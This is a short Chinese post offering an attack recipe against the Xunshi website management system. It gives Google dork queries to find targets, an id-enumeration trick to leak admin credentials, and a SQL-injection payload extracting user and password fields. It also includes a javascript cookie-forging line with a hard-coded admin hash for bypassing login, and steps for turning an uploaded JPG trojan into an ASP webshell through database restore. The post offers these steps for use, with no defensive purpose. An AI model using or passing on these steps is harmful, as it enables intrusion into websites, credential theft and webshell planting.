讯时网站管理系统通杀0DAY漏洞

 在谷歌搜索 inurl: admin/admin_news_pl_view.asp    打开搜索到的网址或者输入 inurl:news_more.asp?lm2= 

 然后修改成 admin/admin_news_pl_view.asp?id=1 或者 admin/admin_news_pl_view.asp?id=2 或者 admin/admin_news_pl_view.asp?id=3

只要显示错误就一直打3,4,5......
找到管理员和32位MDB密码后破解MDB密码,然后进后台  admin/admin_index.asp 输入破解好的用户名和密码直接进系统

讯时网站管理系统通杀0DAY漏洞_第1张图片

另外还可以这样子进后台:

|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='             // 得到管理员用户和MD5密码
cookies进后台
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));

在系统里面有上传图片的功能,上传后,再用备份恢复数据库的功能来恢复上传好的JPG木马成 ASP格式,搞定。

你可能感兴趣的:(JavaScript,数据库,user,Cookies,asp,破解)